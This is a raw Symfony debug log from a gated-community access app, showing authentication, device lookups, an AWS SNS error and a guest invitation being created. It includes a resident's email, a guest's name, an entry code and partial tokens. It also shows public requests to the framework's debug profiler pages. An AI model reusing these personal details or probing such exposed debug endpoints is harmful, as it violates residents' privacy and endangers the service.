  4418. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.uuid = ? LIMIT 1 ["4cf416c3-f8a2-4b97-aec0-5e [...]"] []
  4419. [2025-12-18 20:26:03] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  4420. [2025-12-18 20:26:03] doctrine.DEBUG: "START TRANSACTION" [] []
  4421. [2025-12-18 20:26:03] doctrine.DEBUG: UPDATE device SET date_created = ?, date_modified = ? WHERE id = ? ["2022-11-28 02:48:14","2025-12-18 20:26:03",566] []
  4422. [2025-12-18 20:26:03] doctrine.DEBUG: "COMMIT" [] []
  4423. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT d0_.id AS id_0, d0_.uuid AS uuid_1, d0_.status AS status_2, d0_.date_created AS date_created_3, d0_.date_modified AS date_modified_4, d0_.guid AS guid_5, d0_.endpoint_arn AS endpoint_arn_6, d0_.token AS token_7, d0_.identifier AS identifier_8, d0_.model AS model_9, d0_.os AS os_10, d0_.app_version AS app_version_11, d0_.arn_status AS arn_status_12, d0_.type AS type_13, d0_.app AS app_14, d0_.user_id AS user_id_15 FROM device d0_ WHERE (d0_.token = ?) AND (d0_.uuid <> ?) ["925b97ba1533870e655db98c25 [...]","4cf416c3-f8a2-4b97-aec0-5e [...]"] []
  4424. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.status = ? [375,1] []
  4425. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [251] []
  4426. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  4427. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [375,251] []
  4428. [2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.arn AS arn_7, t0.type AS type_8 FROM topic t0 WHERE t0.name = ? LIMIT 1 ["residential-7ff0f4e0-7d46- [...]"] []
  4429. [2025-12-18 20:26:03] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "Subscribe" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClie (truncated...)  InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClientTokenId</Code>     <Message>The security token included in the request is invalid.</Message>   </Error>   <RequestId>f6702d27-6810-5b57-9cbd-4c990d8b3c15</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"Subscribe\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClientTokenId</Code>\n    <Message>The security token included in the request is invalid.</Message>\n  </Error>\n  <RequestId>f6702d27-6810-5b57-9cbd-4c990d8b3c15</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
  4430. [2025-12-18 20:26:03] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  4431. [2025-12-18 20:26:07] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"a725d03d-0217-4179-9082-5a05b0a9293e","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/a725d03d-0217-4179-9082-5a05b0a9293e/providers","method":"GET"} []
  4432. [2025-12-18 20:26:07] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  4433. [2025-12-18 20:26:07] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
  4434. [2025-12-18 20:26:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  4435. [2025-12-18 20:26:07] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosmurillosemerena@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  4436. [2025-12-18 20:26:07] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  4437. [2025-12-18 20:26:07] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4438. [2025-12-18 20:26:07] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4439. [2025-12-18 20:26:07] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4440. [2025-12-18 20:26:07] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4441. [2025-12-18 20:26:07] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
  4442. [2025-12-18 20:26:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  4443. [2025-12-18 20:26:07] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4444. [2025-12-18 20:26:07] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4445. [2025-12-18 20:26:07] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4446. [2025-12-18 20:26:07] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  4447. [2025-12-18 20:27:18] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  4448. [2025-12-18 20:27:18] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  4449. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
  4450. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  4451. [2025-12-18 20:27:18] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosmurillosemerena@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  4452. [2025-12-18 20:27:18] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  4453. [2025-12-18 20:27:18] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4454. [2025-12-18 20:27:18] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4455. [2025-12-18 20:27:18] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4456. [2025-12-18 20:27:18] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4457. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
  4458. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  4459. [2025-12-18 20:27:18] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4460. [2025-12-18 20:27:18] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4461. [2025-12-18 20:27:18] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4462. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
  4463. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [375,251,1] []
  4464. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["586cd940-fe5c-40f9-b203-99 [...]"] []
  4465. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
  4466. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [375,251,1] []
  4467. [2025-12-18 20:27:18] doctrine.DEBUG: "START TRANSACTION" [] []
  4468. [2025-12-18 20:27:18] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"f5fb1cf7-ba48-477a-88d3-3a [...]","2":1,"3":"2025-12-18 20:27:18","4":"2025-12-18 20:27:18","5":"Eugenia","6":"Ruiz","7":"336801","8":"/invitation/22c9906b8d8c9a [...]","9":"2","10":"1","11":"2025-12-19 16:00:00","12":null,"13":null,"14":null,"15":251,"16":375} []
  4469. [2025-12-18 20:27:18] doctrine.DEBUG: "COMMIT" [] []
  4470. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  4471. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [251] []
  4472. [2025-12-18 20:27:18] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  4473. [2025-12-18 20:27:18] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a725d03d-0217-4179-9082-5a05b0a9293e","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a725d03d-0217-4179-9082-5a05b0a9293e/invitation/20/0?order=desc","method":"GET"} []
  4474. [2025-12-18 20:27:18] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  4475. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
  4476. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  4477. [2025-12-18 20:27:18] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosmurillosemerena@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  4478. [2025-12-18 20:27:18] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  4479. [2025-12-18 20:27:18] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4480. [2025-12-18 20:27:18] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4481. [2025-12-18 20:27:18] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4482. [2025-12-18 20:27:18] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4483. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
  4484. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  4485. [2025-12-18 20:27:18] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4486. [2025-12-18 20:27:18] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4487. [2025-12-18 20:27:18] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4488. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
  4489. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [375,251,1] []
  4490. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
  4491. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  4492. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [251,1] []
  4493. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [251,1] []
  4494. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  4495. [2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [417] []
  4496. [2025-12-18 20:27:18] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  4497. [2025-12-18 20:28:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=db","method":"GET"} []
  4498. [2025-12-18 20:28:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  4499. [2025-12-18 20:29:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"210654","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/210654?panel=time","method":"GET"} []
  4500. [2025-12-18 20:29:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4501. [2025-12-18 20:37:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"088b20","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/088b20?panel=cache","method":"GET"} []
  4502. [2025-12-18 20:37:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4503. [2025-12-18 20:45:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4504. [2025-12-18 20:46:05] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  4505. [2025-12-18 20:46:08] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"342871","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/342871","method":"GET"} []
  4506. [2025-12-18 20:46:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"210654","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/210654?panel=security","method":"GET"} []
  4507. [2025-12-18 20:46:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4508. [2025-12-18 20:55:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"088b20","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/088b20","method":"GET"} []
